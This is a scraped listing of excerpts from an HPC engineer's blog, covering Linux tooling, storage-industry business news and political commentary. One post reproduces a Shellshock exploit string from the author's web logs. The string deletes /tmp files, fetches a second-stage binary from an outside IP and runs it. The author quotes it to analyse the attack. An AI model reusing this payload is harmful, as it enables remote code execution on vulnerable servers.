So there I was, trying to use a serial port on a node which was connected to a serial port on a switch. Which I needed to properly configure the switch. So I light up minicom and get garbage. Great, a baud rate mismatch, easily fixed. Fix it. Connect again. I get the first 10-12 characters … and then garbage. Hmmm. I’d like to pause our story for a moment, and say I had the key insight at this moment … but that would not be true.
Posts
I don't agree with everything he wrote about systemd, but he isn't wrong on a fair amount of it
Systemd has taken the linux world by storm. Replacing 20-ish year old init style processing for a more legitimate control plane, and replacing it with a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn’t a bad thing if you are a desktop linux user, as I am).
Posts
That was fun ... no wait ... the other thing ... not fun
Long overdue update of the server this blog runs on. It is no longer running an Ubuntu flavor, but instead running SIOSv2 which is the same appliance operating system that powers our products. This isn’t specifically a case of eating our own dog-food, but more a case that Ubuntu, even the LTS versions, has a specific sell by date, and it is often very hard to update to the newer revs.
Posts
new SIOS feature: compressed ram image for OS
Most people use squashfs which creates a read-only (immutable) boot environment. Nothing wrong with this, but this forces you to have an overlay file system if you want to write. Which complicates things … not to mention when you overwrite too much, and run out of available inodes on the overlayfs. Then your file system becomes “invalid” and Bad-Things-Happen(™). At the day job, we try to run as many of our systems out of ram disks as we can.
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on hacker news to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many things I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
Updated net-tools bits
So far, 3 components, and working to fix a few things in formatting. On github, grab it here. First, lsbond.pl to report about bond details
root@unison-mgr-1:~/net-tools# ./lsbond.pl
bond0: mac 0c:c4:7a:48:69:cb
  state up
  mode fault-tolerance (active-backup)
  xmit_hash layer2 0
  active slave eth1
  polling 100 ms
  up_delay 200 ms
  down_delay 200 ms
  slave nics:
    eth1: mac 0c:c4:7a:48:69:cb, link 1, state up, speed 1000, driver igb, version 5.3.2.2 firmware version 1.61,0x8000090e
bond1: mac 00:12:c0:80:26:76
  state up
  mode fault-tolerance (active-backup)
  xmit_hash layer2 0
  active slave eth3
  polling 100 ms
  up_delay 200 ms
  down_delay 200 ms
  slave nics:
    eth2: mac 00:12:c0:80:26:76, link 1, state up, speed 10000, driver ixgbe, version 4.
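Much of this information is exposed by the Linux bonding driver under /proc/net/bonding/<bond>. The following is a rough Python sketch of pulling the key/value pairs out of that file. It is not how lsbond.pl is implemented (that is not shown here), and the sample text is an abbreviated, hand-written illustration reusing the bond0 values above rather than captured output.

```python
def parse_bonding(text):
    """Parse 'Key: value' lines into a bond dict with a list of slaves."""
    bond = {"slaves": []}
    current = bond
    for line in text.splitlines():
        if ":" not in line:
            continue  # skip blank lines
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Slave Interface":
            # Lines after this one describe this slave until the next one.
            current = {"name": value}
            bond["slaves"].append(current)
        else:
            current[key] = value
    return bond


# Illustrative sample only; a real file carries more fields.
sample = """\
Bonding Mode: fault-tolerance (active-backup)
Currently Active Slave: eth1
MII Status: up
MII Polling Interval (ms): 100
Up Delay (ms): 200
Down Delay (ms): 200

Slave Interface: eth1
MII Status: up
Speed: 1000 Mbps
Permanent HW addr: 0c:c4:7a:48:69:cb
"""

bond = parse_bonding(sample)
print(bond["Bonding Mode"], [s["name"] for s in bond["slaves"]])
```

On a live system the same function could be fed the contents of /proc/net/bonding/bond0. Driver and firmware versions are not in that file and would have to come from elsewhere.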
Posts
SIOS v2.0 running pxe booted
Our SIOS (Linux based OS, usually based upon Debian) has just been updated for jessie (Debian 8). This was necessary to support rkt, docker, etc. in addition to our other bits. It’s been cooking in the background for a while, for, as you might have noticed from my posting frequency, I’ve been busy. But we are up, and running. Base distro version here:
root@usn-ramboot:~# df -h
Filesystem Size Used Avail Use% Mounted on
tmpfs 8.
Posts
Systemd, and the future of Linux init processing
An interesting thing happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to Systemd. As have a number of others. Including, surprisingly, Debian. For those who don’t know what this is, think of it this way.
Posts
Mixing programming languages for fun and profit
I’ve been looking for a simple HTML5-ish way to represent our disk drives in our Unison units. I’ve been looking for some simple drawing libraries in javascript to make this higher level, so I don’t have to handle all the low level HTML5 bits. I played with Raphael and a few others (including paper.js). I wound up implementing something in Raphael.
The code that generated this was a little unwieldy … as javascript doesn’t quite have all the constructs one might expect from a modern language.
Posts
And the 0.8.3 InfluxDB no longer works with the InfluxDB perl module
I ran into this a few weeks ago, and am just getting around to debugging it now. Traced the code, set up a debugger and followed the path of execution, and … and … Yup, it’s borked. So, I can submit a patch or 3 against the InfluxDB code, or roll a simpler more general Time Series Data Base interface that will talk to InfluxDB. And eventually kdb+. Since I wanted to code for that as well, I am looking more seriously at the second option.
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000
Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. It’s way too freaking simple.
Posts
New monitoring tool, and a very subtle bug
I’ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today. The monitoring code talks to a graphite backend. Could talk to statsd, or other things. In this case, we are using the InfluxDB plugin for graphite. I wanted an insanely simple local data collector.
Posts
InfluxDB cli is up on github
I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and … well … Link is here. And yes, the readme is borked about 1/2 way through. Doesn’t quite show the formatting of the output quite right. Will try to fix over the weekend, as I move this toward a far more feature complete state.
Posts
Have a nice cli for InfluxDB
I tried the nodejs version and … well … it was horrible. Basic things didn’t work. Made life very annoying. So, being a good engineering type, I wrote my own. It will be up on our site soon. Here’s an example
./influxdb-cli.pl --host 192.168.5.117 --user test --pass test --db metrics
metrics> \list series
.----------------------------------.
| series name                      |
+----------------------------------+
| lightning.cpuload.avg1           |
| lightning.cputotals.idle         |
| lightning.cputotals.irq          |
| lightning.
Posts
Be on the lookout for 'pauses' in CentOS/RHEL 6.5 on Sandy Bridge
Probably on Ivy Bridge as well. Short version. The pauses that plagued Nehalem and Westmere are baaaack. In RHEL/CentOS 6.5 anyway. A customer just ran into one. We helped diagnose/work around this a few years ago when a hedge fund customer ran into this … then a post-production shop … then … Basically the problem came in from the C-states. The deeper the sleep state, in some instances, the processor would not come out of it, or get stuck in the lower levels.
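When chasing this sort of thing, it helps to see which idle states the kernel actually exposes for a core. The sketch below reads the standard Linux cpuidle sysfs files (name, latency, disable) for one CPU. It is a diagnostic aid only, not the work-around mentioned above, and `list_cstates` is a name invented for this example.

```python
from pathlib import Path


def list_cstates(cpu_dir):
    """Return (name, exit latency in microseconds, disabled) per idle state."""
    state_dirs = sorted(
        Path(cpu_dir, "cpuidle").glob("state*"),
        key=lambda p: int(p.name[len("state"):]),  # state10 sorts after state2
    )
    states = []
    for state in state_dirs:
        name = (state / "name").read_text().strip()
        latency_us = int((state / "latency").read_text())
        disabled = (state / "disable").read_text().strip() == "1"
        states.append((name, latency_us, disabled))
    return states
```

Calling `list_cstates("/sys/devices/system/cpu/cpu0")` on a machine with cpuidle enabled returns one tuple per state, shallowest first. Taking the directory as an argument keeps the function easy to point at a copy of the tree gathered from a customer machine.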
Posts
Don't know if I mentioned it, but the day job has a new website
Take a gander. Some things are missing, and our marketing folks are developing the content where needed, and revising it where we have existing content. It’s quite refreshing to see this. It will get better over time. It’s running in our facility now, and likely we’ll have a few clones in the cloud as well. But that’s for later.
Posts
Update on IPMI Console Logger
Config now comes from some nice and simple json, and it handles multiple machines with aplomb. See the git repository for the latest. The config file example is in there, and you can replicate the n01-ipmi section with more nodes trivially. Coming next is getting config from a trusted web server, along with registering the client to the trusted web server. This prevents things like passwords from showing up in the clear, though you can always create a lower privileged user to access the console for monitoring.
Category: diagnostics
Posts
On technology zealotry
I’ve encountered this in my career, at many places. Sadly, early in my career, I participated in some of this. You are a zealot for a particular form of tech if you can see it do no wrong, and decry reports of issues or problems as “attacks”. You are a zealot against a particular form of tech if you cannot see it as a potentially useful and valuable portion of a solution stack, and (often gleefully) amplify reports of issues or problems.
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and the “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk who might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
On hackerrank and Julia
My new day job has me developing considerably less code than my previous endeavor, so I like to work on problems to keep these particular muscles in steady use. Happily, I get to do more analytics than ever before, so this at least is some compensation for the lower amount of coding. When I work on coding for myself, I’ll play with problems from my research days, or small throw-away ones, like on Hackerrank.
Posts
pcilist: because sometimes you really, really need to know how your PCIe devices are configured
If you don’t know what I am talking about here, that’s fine. I’ll assume you don’t do hardware, or you call someone else when there is a hardware problem. If you think “well gee, don’t we have lspci? so why do we need this?” then you probably have not really tried to use lspci to find this information, or didn’t know it was available. Ok … what I am talking about.
Posts
That was fun: mysql update nuked remote access
Update your packages, they said. It will be more secure, they said. I guess it was. No network access to the databases. Even after turning the database server instance to listen again on the right port, I had to go in and redo the passwords and privileges. So yeah, this broke my MySQL instance for a few hours. Took longer to debug as it was late at night and I was sleepy, so I put it off until morning with caffeine.
Posts
An article on Rust language for astrophysical simulation
It is a short read, and you can find it on arxiv. They tackled an integration problem, basically using the code to perform a relatively simple trajectory calculation for a particular N-body problem. A few things leapt out at me during my read. First, the example was fairly simplistic … a leapfrog integrator, and while it is a symplectic integrator, this particular algorithm is not quite high enough order to capture all the features of the N-body interaction they were working on.
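For readers who have not met it, a leapfrog step can be sketched in a few lines. This is a minimal kick-drift-kick version in Python (not the paper's Rust code), applied to a one-dimensional harmonic oscillator as a stand-in test problem rather than their N-body setup. The function names, the step size, and the test problem are all assumptions for illustration.

```python
def leapfrog(x, v, accel, dt, steps):
    """Kick-drift-kick leapfrog: second-order accurate and symplectic."""
    a = accel(x)
    for _ in range(steps):
        v += 0.5 * dt * a   # half kick with the old acceleration
        x += dt * v         # full drift
        a = accel(x)        # acceleration at the new position
        v += 0.5 * dt * a   # half kick with the new acceleration
    return x, v


def energy(x, v):
    """Total energy of a unit-mass, unit-frequency harmonic oscillator."""
    return 0.5 * v * v + 0.5 * x * x


x0, v0 = 1.0, 0.0
x1, v1 = leapfrog(x0, v0, lambda x: -x, dt=0.01, steps=10_000)
drift = abs(energy(x1, v1) - energy(x0, v0))
print(f"energy drift after 10000 steps: {drift:.2e}")
```

The energy error stays bounded instead of growing with the number of steps, which is the appeal of a symplectic scheme. The error per step still scales with the square of the step size, which is the "not quite high enough order" concern.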
Posts
strace -p is your friend
So there I was, trying to use a serial port on a node which was connected to a serial port on a switch. Which I needed to properly configure the switch. So I light up minicom and get garbage. Great, a baud rate mismatch, easily fixed. Fix it. Connect again. I get the first 10-12 characters … and then garbage. Hmmm. I’d like to pause our story for a moment, and say I had the key insight at this moment … but that would not be true.
Posts
I don't agree with everything he wrote about systemd, but he isn't wrong on a fair amount of it
Systemd has taken the linux world by storm, replacing 20-ish year old init style processing with a more legitimate control plane, and a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn’t a bad thing if you are a desktop linux user, as I am).
Category: economics
Posts
Opening keynote @Supercomputing #SC18 : #HPC is an enabling technology ...
… Ok, the speaker said far more than that. But one of his central theses is that in this “second” machine revolution, we are enabling data driven decision making, distributed decision and consensus, as well as expanding beyond the confines of specific expertise in a field. The latter I’ve heard described as cross fertilization … gather a bunch of smart people “together” and give them a problem spec. Let them run with it.
Posts
Oracle finally kills off Solaris and SPARC
This was making the rounds last week. Oracle seems to have a leak in its process, creating labels that trigger event notifications for people, for their packages. Solaris was decimated. More details at the links and at The Layoff. Honestly I had expected them to reach this point. I am guessing that they were contractually obligated for at least 7 years to provide Solaris/SPARC support to US government purchasers. SGI went through a similar thing with IRIX.
Posts
M&A and business things
First up, Tegile was acquired by Western Digital (WDC). This is in part due to WDC’s desire to be a one stop shop vertically integrated supplier for storage parts, systems, etc. This is how all of the storage parts OEMs needed to move, though Seagate failed to execute this correctly, selling off their array business in part to Cray. Toshiba … well … they have some existential challenges right now, and are about to sell off their profitable flash and memory systems business, if they can just get everyone to agree … This comes from the fact that spinning disk, while a venerable technology, has been effectively completely commoditized.
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about via Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of a preceding transaction of Xyratex. Xyratex was the basis for the Cray storage platforms (post Engenio).
Posts
Selling #HPC things on ebay
Given that the (now former) day job has ended, I am selling some of the old day job’s assets on ebay. We’ve sold some siFlash, Unison, and have current listings for Arista and Mellanox switches. More stuff will be listed in short order, check it out here. Feel free to reach out to me at joe.landman at the google mail thingy if you want to talk about any of these things, or buy before I list them.
Posts
Some updates coming soon
I should have something interesting to talk about over the next two weeks, though a summary of this is Scalable Informatics is undergoing a transformation. The exact form of this transformation is still being determined. In any case, I am no longer at Scalable. Some items of note in recent weeks.
M&A: Nimble was purchased by HPE. Not sure of the specifics of “why”, other than HPE didn’t have much in this space.
Posts
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I’ve tried to explain to others in phone conversations, private email threads.
Posts
A nice shout out in ComputerWeekly.com about @scalableinfo #HPC #storage
See the article here.
They mention Axellio, and on The Reg article on their ISE product, they say “X-IO partners using Axellio will be able to compete with DSSD, Mangstor and Zstor and offer what EMC has characterised as face-melting performance.” Hey, we were the first to come up with “face melting performance”. More than a year ago. And it really wasn’t us, but my buddy Dr. James Cuff of Harvard.
Posts
ClusterHQ dies
ClusterHQ is now dead. They were an early container play, building a number of tools around Docker/etc. for the space. Containers are a step between bare metal and VMs. Flocker (ClusterHQ’s product) is open source, and they were looking to monetize it in a different way (not on acquisition, but on support). In this space though, Kubernetes reigns supreme. So competing products/projects need to adapt or outcompete. And it’s very hard to outcompete something like k8s.
Posts
Violin files for Chapter 11
This has been long in coming. I feel for the people involved. Violin makes proprietary flash modules and chassis, to provide an all flash “array”. The performance is somewhat “meh”, and the cost is high. Like most of the rest of the companies in this space, their latest model bits are quite a bit below Scalable’s 4 year old models, never mind the new stuff. Since the IPO, they’ve been on something of a monotonic down-direction in share price.
Posts
On expectations
This has happened multiple times over the last few months. Just variations on the theme as it were, so I’ll talk about the theme. The day job builds some of the fastest systems for storage and analytics in market. We pride ourselves on being able to make things go very … very fast. If it’s slow, IMO, it’s a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors, and fairly simple for us to address.
Posts
A good read on realities behind cloud computing
In this article on the venerable Next Platform site, Addison Snell makes a case against some of the presumed truths of cloud computing. One of the points he makes is specifically something we run into all the time with customers, and yet this particular untruth isn’t really being reported the way our customers look at it. Sure, you are paying for the unused capacity. This is how utility models work. Tenancy is the most important measure to the business providing the systems.
Posts
Seagate and ClusterStor: a lesson in not jumping to conclusions based on what was not said
I saw this analysis this morning on the Register’s channel site. This follows on the announcement of other layoffs and shuttering of facilities. A few things. First a disclosure: arguably, the day job and more specifically our Unison product is in “direct” competition with ClusterStor, though we never see them in deals. This may or may not be a bad thing, and likely more due to market focus (we do big data, analytics, insanely fast storage in hyperconverged packages) than anything else.
Posts
M&A: Vertical integration plays
Two items of note here. First, Cavium acquires qlogic. This is interesting at some levels, as qlogic has been a long time player in storage (and networking). There are many qlogic FC switches out there, as well as some older Infiniband gear (pre-Intel sale). Cavium is more of a processor shop, having built a number of interesting SoC and general purpose CPUs. I am not sure the combo is going to be a serious contender to Intel or others in the data center space, but I think they will be working on carving out a specific niche.
Posts
VC landscape changing: Intel Capital on the market
Saw this in a post on VentureBeat. Intel Capital has been an important player in the space for a while. What happens next to them is worth paying attention to. They’ve been in the thick of many interesting companies, though usually outside of Intel’s core foci. Somewhat beyond the normal corporate strategic VC roles. This could change a number of things for startups … new and existing. VCs have been sitting on the sidelines, or being less active over the recent past, and this is likely not to help the situation.
Posts
Are the wheels coming off?
From Term Sheet (required reading BTW)
Read it all. The thing about bubble valuations and unicorns … neither one will last very long. Pure Storage IPOed this week and they aren’t doing as well in the public markets as their private market valuations might suggest. This is not to say they aren’t a good company, or don’t have a good product. This is saying that the demand for “unicorn” valuations from the buy side is … well … weak.
Posts
M&A: Seagate snarfs up DotHill
The Register reports this morning, that Seagate has acquired DotHill. DotHill makes arrays and their kit is resold and rebadged by many. In general the array market (high end) is in a decline, and doesn’t show signs of turning around (ever). The low and mid market, including some of the cloud bits is growing. I am not sure about the OCP stuff, but the low end bits are where we are seeing 4, 8, and 12 drive arrays show up as completely commoditized gear.
Posts
Drama at Violin Memory
Violin has had a rather tumultuous time in market. Post IPO, they’ve not had a great time selling. They have an interesting product, but with SanDisk coming out with their kit, and many others in the competitive flash array space, this can’t be a fun time for them. They don’t have a large installed base to protect, and their competitors are numerous and fairly well funded. Add to the mix that, as a post-IPO public company, they no longer have the luxury of not hitting targets … they will get slaughtered in the market.
Posts
[Update] debunked ... (was IBM layoffs to hit 25% or so of the company)
[Update] As I had wondered, and others suggested to me, this number (25%) was likely a click bait fabrication. Forbes and others also “fell for it.” I’ll admit I did as well. It was too large to ignore, but it also didn’t make sense. Close down mainframe and storage? Seriously? Let’s call this what it is, an internet rumor that was busted. Paraphrasing Mark Twain: “An internet rumor can travel around the world while the truth is still putting on its shoes”.
Posts
Learning to respect my gut feelings again
A “gut feeling” is, at a deep level, a fundamental sense of something that you can’t necessarily ascribe metrics to, you can’t quantify exactly. It’s not always right. It’s a subconscious set of facts, ideas, concepts that seem to suggest something below the analytical portion of your mind, and it could bias you into a particular set of directions. Or you could take it as an aberration and go with “facts”.
Posts
HP to split up
Interesting changes in the corporate M&A or disaggregation arena. With M&A, you are looking to build market strength by acquiring valuable IP, assets, brands, names, teams, capabilities, trade secrets, special sauces, etc. You do that to make your group stronger and more capable of handling the challenges ahead. With a disaggregation, you slice off disparate portions of the business, and set them free to pursue their own path. This is what was rumored a few weeks ago with EMC, a possible split of the federated businesses.
Posts
An article on Detroit that is worth the read
Detroit had filed for bankruptcy protection a while ago. The rationale for this was simple, they simply did not have the cash flow to pay for all their liabilities. They had limited access to debt markets for a number of reasons, and they couldn’t keep cranking up the taxes on residents and businesses in the city to generate revenue. They were between a rock and a hard place. I have a soft spot in my heart for Detroit.
Posts
Why not go Galt?
For those who don’t get the reference, “going Galt” points back to the masterpiece novel “Atlas Shrugged” by Ayn Rand. In it, one of the characters is named John Galt, and part of what he does, early in the novel, is convince those who create jobs and wealth in the country to abandon their efforts, as the government lurches harder and farther to the redistributionist world view. Indeed, the country eventually goes full on socialist in the story, where people are not allowed to quit work, take a better job, and so forth.
Posts
Violin kicks out founding CEO
Story at The Register. Usually you give a CEO some time to right a listing ship. I pointed out in a recent post that there are some significant grumblings about Violin and in fact about most of the flash-as-rack-appliance space. I had noted
We’ve run into them a few times in competitive situations, so take what I write about them with an appropriate mass of NaCl. All the pure-play flash array vendors have to answer a basic question about their existence.
Posts
Oh dear lord
Let’s see if this actually materializes. It’s pretty obvious as to how hard the media folks tried to spin this with the title. A good rubric for how the US media treats the president and his opposition could be found in this cartoon. With that in mind, read the title of that article, and then note this little tidbit on the inside:
Notice the scare quotes around the word treason. Treason has a very straightforward definition in the US Constitution.
Posts
You get what you vote for
This is sad.
Here’s the really sad parts of this
Not only did they close the parks, but they turned off the web sites. The park employees are being ordered to make life as hard as possible for the patrons. None of this had to happen. Had the democrats decided that, ya know, in a political environment where negotiation is the key to advancing agendas, and not a burnt ground strategy, chances are they would be able to get some of what they wanted.
Posts
Part of the reason why Detroit has a long rough road ahead
is due, in significant part, to bad law and bad policy enshrined in law. Ideological view points are hard coded in the firmware of Michigan. Which allows lawsuits and results such as this. It cannot be overemphasized how bone-headed this particular law is. That one can never, under any circumstances, reduce pensioner benefit values. This means, if you ever struck a bad deal, like Detroit, and many others in Michigan have, you have no choice but to continue this bad deal for eternity.
Posts
... and bang goes Detroit ...
This brings me no joy. I went to grad school in Detroit. I like this city. It has character, it has guts, it has potential. It also has no cash to continue operations. And that sucks. Detroit filed for chapter 9 bankruptcy a few hours ago. There are many reasons for this, but there are a number of specific ones, that are generalizable to businesses as well. First, population decline has led to a tax revenue decline.
Posts
You can't make this stuff up, 10-June-2013 edition
Link here. Don’t want to tax ALL businesses … out of business? Just some of them? Are you mad? Are you freaking kidding me? Pulling my leg? Very sad. Very very sad. The government should be seeking to reduce taxes to make sure businesses grow, and hire, and spend. Mr. President, the entire role of government in business should be to get out of the way, lest you slow down growth, employment, and spending.
Posts
Do we really have enough native STEM workers in the US?
Yes, actually we do. Too many. Turns out that little law of supply and demand does in fact hold true. The higher the demand for something in limited supply, the higher the price (wages) you will pay for it. By applying forces to this law, you impact a number of outcomes. That is, if you start monkeying around with the supply, sure, you can adjust the price you pay for the STEM.
Posts
This will not end well
Watching the slow motion train wreck in Cyprus made me wonder exactly who the target of the money grab was. And more importantly, whether or not the people making demands had any clue that their victory was, at best, Pyrrhic, and at worst, a serious contagion. Any financial system in operation is built upon various levels of trust, implicitly in the case of the least risky capital storage system. You know that you can trust, within reasonable expectations and parameters, that capital that you deposit there can be retrieved later.
Posts
Will the US default soon?
Quite possibly. We have a toxic mixture of overspending, insufficient revenue to cover the spending, and a borrowing limit. Several ideas have been floated over the last few weeks, including minting a $1T USD coin and depositing it in the federal reserve. That’s $10^12 USD folks. This is sort of like quantitative easing, aka printing more money, but far far worse. Anyone who has ever been early into a startup and watched the value of their options get diluted with each new capital infusion knows exactly what this is.
Posts
1 January 2013 : its over the cliff we go!
[update] This pretty much says it all. [update 2] … and … they … fold. A bad deal, about to be voted into law. As they said, elections have consequences. Whatever happens, they (WH and Senate) now own it. No cuts, just taxes. Even though our problem is way too much spending and mis-targeted tax increases.
Less than 10 hours into the new year for us here in GMT-5. There is some aspect of humanity whereby many view this as a hopeful time, a chance to “begin anew”.
Posts
Going over the (US fiscal) cliff
[update] There’s a good piece on the impact upon the potential negotiations and its impact upon one party. As I noted below, any deal done between 1-Jan and now will be a bad deal. The only way to get real spending cuts is to go over the cliff, so let’s do this. I don’t care about the political fortunes impact. I care about the long term impact upon the country of out of control spending.
Posts
On the dangers of economic prognostication, and presidential elections
is drinking your own koolaid, consuming your own product, believing the wishful thinking that underlies your most serious predictions. Like this. Just like in catastrophic AGW, there’s one single chart that belies all the claims as to how “well” the “stimulus” package did. It’s a damning chart. Here it is.
[ ](http://www.aei-ideas.org/2012/11/is-this-as-good-as-it-gets-novembers-dismal-new-normal-jobs-report/)
And worse, if you look at how the recovery compares to others … it’s not going very well at all.
Posts
Interesting post on macroeconomic trends, risk, investment, and farms
Saw this linked from zerohedge. Understand that, to a degree, this is a sales pitch for this person’s new fund. But the reasoning behind doing what they are doing is fascinating to me. Along with a description of what happened to the global financial markets.
Definitely worth the view just for the history and an analysis of macroeconomic trends.
Posts
Interesting and depressing article on Michigan's future
A few prefaces … First, I disagree with the premise throughout this article that our governor is timid. He is, IMO, and in many people’s opinion, doing a great job. Governor Romney is very similar to Governor Snyder in many ways. Timidity really isn’t apparent. I guess that people see someone making a cost-benefit analysis for engaging in a particular debate, or pushing for a particular outcome, and deciding to forgo a particular fight, as being timid.
Posts
Beautiful smackdown
This is epic. As originally seen on @mndoci ’s twitter stream. Short version: Those who don’t have a clue, really … REALLY … shouldn’t write lengthy journal articles about what they don’t have a clue about. Lest they get smacked down. Like this. For some reason, it’s an article of faith for many people, who largely do not understand why, that the big drug companies are EEEEVVIIIILLL (hope I used enough I’s there).
Category: entertainment
Posts
Typecasting and the "trust us" factor
Finding myself on the other side of the table in the consumer-vendor relationship has resulted in some eye opening experiences. These are things I look back on, and realize that I strenuously avoided doing during my Scalable days. But I see everyone doing it now, as they try to sell me stuff, or convince me to use things. One of the eye opening things is a bit of typecasting of sorts.
Posts
Ten years ago this blog was born
This was my first post. On 12-October-2005. I’ve written about many things over the past decade. 2000 plus posts, 200 per year, averages about 4 every 7 days or so. I’ve slowed down a bit in recent months, as work has grown more intense, but there are many thoughts I want to get down. To a large extent, my journey through HPC has been an interesting one, and only slightly captured in these posts.
Posts
Voting in HPCWire's readers choice awards are open, please vote!
Our friends at Lucera are in number 6 for best use of HPC in a financial services category. Our Unison product is at number 11 for Best HPC Storage Product or Technology. And I did a write in for #21 for us :D. Our friends at Mellanox have their 100Gb EDR Infiniband technology at number 14. Please do vote (early, not often).
Posts
Has Alibaba been compromised?
I saw this attack in the day job’s web server logs today. From IP address 198.11.176.82, which appears to point back to Alibaba. This doesn’t mean anything in and of itself, until we look at the payload.
()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*;echo%20wget%20http://115.28.231.237:999/htrdps%20-O%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20echo%20By%20China.Z%20%3E%3E%20/tmp/Run.sh;echo%20chmod%20777%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20rm%20-rf%20/tmp/Run.sh%20%3E%3E%20/tmp/Run.sh;chmod%20777%20/tmp/Run.sh;/tmp/Run.sh/x22
This appears to be an attempt to exploit a bash hole. What is interesting is the IP address to pull the second stage payload from. Run a whois against that … I’ll wait.
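To make the logged string easier to read, one can URL-decode it. The sketch below decodes only the leading fragment of the payload above, using Python's standard `urllib.parse.unquote`. The variable names and the simple prefix check are assumptions for illustration, not a complete detector.

```python
from urllib.parse import unquote

# Leading fragment of the logged request, copied from the payload above.
logged = "()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20"

# %20 is a space, %7B and %7D are the curly braces.
decoded = unquote(logged)

# A bash function definition at the start of a header value is the
# telltale shape of this class of exploit attempt.
looks_like_function_definition = decoded.lstrip().startswith("() {")

print(repr(decoded))
print("suspicious:", looks_like_function_definition)
```

Decoded, the request opens with an empty bash function definition followed by a command, which is what makes the rest of the string (the wget of a second stage and the chmod/run sequence) dangerous on an unpatched bash.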
Posts
Nails it !!!
Dave Barry in his usual fine form … summarizes our year. The one take away should be … WHAP
Category: entrepreneur
Posts
Opening keynote @Supercomputing #SC18 : #HPC is an enabling technology ...
… Ok, the speaker said far more than that. But one of his central theses is that in this “second” machine revolution, we are enabling data driven decision making, distributed decision and consensus, as well as expanding beyond the confines of specific expertise in a field. The latter I’ve heard described as cross fertilization … gather a bunch of smart people “together” and give them a problem spec. Let them run with it.
Posts
#HPC in all the things
I read this announcement this morning. Our friends at Facebook releasing their reduced precision server side convolution and GEMM operations.
Many years ago, I tried to convince people that HPC moves both down market, into lower cost hardware, as well as more widely into more software toolchains. Basically, the decades of experience building very high performance applications and systems will have value downstream for many users over time.
GEMM is a generalized approach to a matrix multiply, which has been well optimized for HPC applications in various scientific libraries over time.
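In BLAS terms, GEMM computes C ← αAB + βC, a matrix product with scaling factors and an accumulate into an existing matrix. A minimal pure-Python sketch of that operation follows. The function name and list-of-lists layout are assumptions for illustration; it makes no attempt at the blocking, vectorization, or reduced precision that make real implementations fast.

```python
def gemm(alpha, A, B, beta, C):
    """Return alpha * (A x B) + beta * C for row-major lists of lists."""
    m, k, n = len(A), len(B), len(B[0])
    if any(len(row) != k for row in A):
        raise ValueError("inner dimensions of A and B do not match")
    if len(C) != m or any(len(row) != n for row in C):
        raise ValueError("C must be m x n")
    # Start from the scaled accumulator, then add the scaled product.
    out = [[beta * C[i][j] for j in range(n)] for i in range(m)]
    for i in range(m):
        for p in range(k):
            a = alpha * A[i][p]
            for j in range(n):
                out[i][j] += a * B[p][j]
    return out


A = [[1.0, 2.0], [3.0, 4.0]]
B = [[5.0, 6.0], [7.0, 8.0]]
C = [[1.0, 1.0], [1.0, 1.0]]
result = gemm(2.0, A, B, 0.5, C)
print(result)  # [[38.5, 44.5], [86.5, 100.5]]
```

Setting α = 1 and β = 0 reduces this to a plain matrix multiply. The accumulate form is what lets libraries chain blocks of a larger product together.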
Posts
Looking forward to #SC18 next week and a discussion of all things #HPC
I’m attending SC18 next week. It’s been 3 years since I last attended (2015). Then we (@scalableinfo) had a large booth, lots of traffic, and showed off some of the first commercial NVMe high performance storage systems running BeeGFS over 100GbE.
I am looking forward to talking with as many people as I can, to get their perspectives on things. To see what they are thinking, hear what they are doing, and in which direction they are going.
Posts
Well ... that was fun
So … I’ve had this blog since 2005. I installed it from original sources. And WP made upgrades in the 2.x time frame, quite painless.
Or so it seemed.
Slowly, over time, some configuration/settings/whatever got out of whack. And with the last update, from a system originally installed in final form in 2013 or so, something broke.
I am not sure what. But the symptoms were simple … new posts would replace the most recent posts.
Posts
So I've got ideas for two businesses
